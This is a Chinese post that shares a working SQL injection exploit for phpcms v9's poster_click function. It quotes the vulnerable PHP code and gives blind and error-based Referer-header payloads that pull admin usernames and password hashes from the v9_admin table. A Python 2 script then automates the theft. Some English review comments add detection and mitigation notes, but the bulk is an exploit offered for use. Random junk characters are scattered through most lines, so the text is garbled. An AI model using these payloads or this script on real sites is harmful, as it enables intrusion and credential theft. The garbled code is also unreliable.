有人放出了phpcmsv9的0day,就随手写了个利用代码,其中注入代码有两种形式:
$ f& S8 X. t" U7 i0 D3 i: A3 l; G: j' R2 ~9 S
问题函数:\phpcms\modules\poster\index.php
( N: j: [. F t( u6 J% l' R0 V1 K! } \, C
/**
 * Records a click on the poster selected by $_GET['id'] and redirects the
 * visitor to the poster's link URL.
 *
 * Review notes (security):
 *  - The INSERT below stores HTTP_REFERER and a cookie-derived username as
 *    received; nothing in this method escapes them. The exploitation section
 *    of this page shows the Referer header reaching SQL unchanged, so the
 *    value must be escaped or parameterised before it is used in a query.
 *    Whether param::get_cookie() sanitises its result is not visible here.
 *  - In the else branch, $_GET['url'] is passed straight to header('Location:'),
 *    so the request can choose the redirect target (open redirect); restrict
 *    the target to the configured linkurl or an allow-list.
 *
 * Returns false when no poster row matches $id; otherwise sends a Location
 * header and returns nothing.
 */
public function poster_click() {
// $id is cast with intval(), so this parameter itself is not the injection point.
$ L/ m+ p3 ^* y. S1 d9 ^$id = isset($_GET['id']) ? intval($_GET['id']) : 0;2 p7 }7 R! V6 t+ d$ d
$r = $this->db->get_one(array('id'=>$id));
// Unknown poster id: nothing is recorded and no redirect is sent.
7 }% S2 @* q( {3 E/ oif (!is_array($r) && empty($r)) return false;6 ^" A7 d. B M3 L" }! i$ }
$ip_area = pc_base::load_sys_class('ip_area');, D m) Z) u2 ]& [7 Z
$ip = ip();
7 y3 i0 _* e) e) b# A$ j1 [$ n$area = $ip_area->get($ip);
// Username is taken from a client-supplied cookie; treat it as untrusted input.
7 H6 j- X2 W9 g' O( {$username = param::get_cookie('username') ? param::get_cookie('username') : '';
Z/ Z7 y' ]+ a# q0 ?1 @% q& X8 oif($id) {
5 p, K& [, p$ J( \) Y) D% j5 s$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();# p6 G: v0 N8 I
// 'referer' => HTTP_REFERER: the raw Referer header value goes into the INSERT
// without any escaping in this method — this is the injection sink. HTTP_REFERER
// is defined outside this file (presumably from $_SERVER['HTTP_REFERER']; confirm).
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
: b& c1 w7 G z+ e6 \: s5 w2 c}: t4 u0 A) d% K: L- W
// Increment the poster's click counter.
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
! N& l! e1 Y- `& |$setting = string2array($r['setting']);
// A poster with a single setting always uses its configured linkurl;
// otherwise an explicit url parameter takes precedence.
! T0 z/ x4 M4 y( dif (count($setting)==1) {: S' Q# C$ l6 E9 o# ?# `! a5 }) c
$url = $setting['1']['linkurl'];
9 H5 c i. ~6 u6 M- \} else {7 s6 y$ U. x4 I) B7 f, T' Z
// $_GET['url'] is used as the redirect target without validation.
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];+ b# N# j8 g2 a4 {
}
// NOTE(review): no exit() follows header(), so execution continues after the
// redirect is issued.
. z1 W9 f6 O. V* a( cheader('Location: '.$url);
' b8 R1 `! I6 }}
h `$ G4 o$ ~8 M: k, f) w
& k& F& d8 T- W9 o6 _$ I2 R# { 0 l& z# a/ H6 l3 x
利用方式:
1、可以采用盲注入的手法:
1 F1 C% }6 ]. C5 a O/ c% _. F/ K6 b
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#6 V! ]5 f8 ? }
0 s: z( f# U& I, Q) d: L: y& n* ?' s; U7 i
通过返回页面正常与否,逐个猜解密码字段。
$ y* @& L2 Z* ~' M e4 T6 P% m! b/ g9 Q
2、代码是花开写的,随手附上了:
) W; w5 }4 L% J3 A( f7 L, ^! [# N! U0 b
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
1 T0 L# @0 c( j* _1 L" U1 T6 @! l s
此方法是报错注入手法,原理自查。
( S( |. _& K+ P- L D% d5 \8 @$ }% m2 e
5 M( G/ ]( c3 O L$ {2 r
利用程序:
" Y; J2 s3 p A8 t) q/ _8 X4 g9 w% l
#!/usr/bin/env python
' {4 O: ^# D+ _, m; {3 fimport httplib,sys,re
7 q) {4 S0 T6 Z: v* {, r1 L& E/ f9 K* [. X6 P u
# Sends a single GET to the phpcms v9 poster_click endpoint with an SQL
# fragment in the Referer header and prints the MySQL "Duplicate entry"
# error text found in the response body.
# Python 2 syntax (print statement, httplib). Host and base path come from
# sys.argv, as checked in the __main__ block below.
#
# Detection notes (all observable in the request/response built here):
#  - request path  index.php?m=poster&c=index&a=poster_click
#  - a Referer header containing SQL keywords (SELECT, information_schema)
#  - a response body containing "Duplicate entry": the database error is
#    being echoed to the client, which is what makes the result readable.
# Mitigation on the server side: escape the Referer value before the INSERT
# in poster_click() and stop returning database error text to clients.
def attack():* l8 }3 c; v1 ?7 J0 t
print “Code by Pax.Mac Team conqu3r!”
- Z, u( D8 S! h! p3 s3 _print “Welcome to our zone!!!”
# sys.argv[1] is the host passed to HTTPConnection, sys.argv[2] the URL prefix.
# p2 Y5 k; a9 T. ]; iurl=sys.argv[1]
( Z* X( y. \# V5 j h' Zpaths=sys.argv[2]! |( o) J2 j& F" E. y
conn = httplib.HTTPConnection(url)
# The Referer header carries the error-based payload quoted in the text above.
# P/ m8 e `7 ri_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,, S& I, p M7 E: S; E" e0 s5 ^! u
“Accept”: “text/plain”,
- u& f2 Y3 w% X“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}* _. J4 _' B( `, H i& K
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
8 ]. H' U# h R7 D. A! kr1 = conn.getresponse()( s- Z+ H0 @8 W, A; I
datas=r1.read()& N: t' P/ g3 ~, H& |- O
# Picks the "Duplicate entry '...'" fragment out of the echoed database error.
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
4 W8 J+ w( a# @print datas[0]
}9 l5 `# n X1 R( b4 Kconn.close()
# Entry point: expects two arguments (host and base path); otherwise prints
# usage and exits with status 1.
" l' K Z+ p% D! q* Q1 O* d; l4 Kif __name__==”__main__”:
, Z$ U6 ?# T" p' `if len(sys.argv)<3:
2 s! E3 i" R0 |3 Q. Bprint “Code by Pax.Mac Team conqu3r”
- S" V7 Z( Q7 Pprint “Usgae:”
8 W& E d% \, I* T7 Pprint “ phpcmsattack.py www.paxmac.org /”
1 {2 W2 C; q( w- gprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
* F4 O! M- k3 x/ c3 t2 z- Xsys.exit(1)+ {& m, d1 C9 K/ l y' ?% C; |
attack()
2 V9 h( R/ O- X, v# w1 \2 u$ p, m
. r! W) U4 W1 H+ R# o ?! Z+ m) O |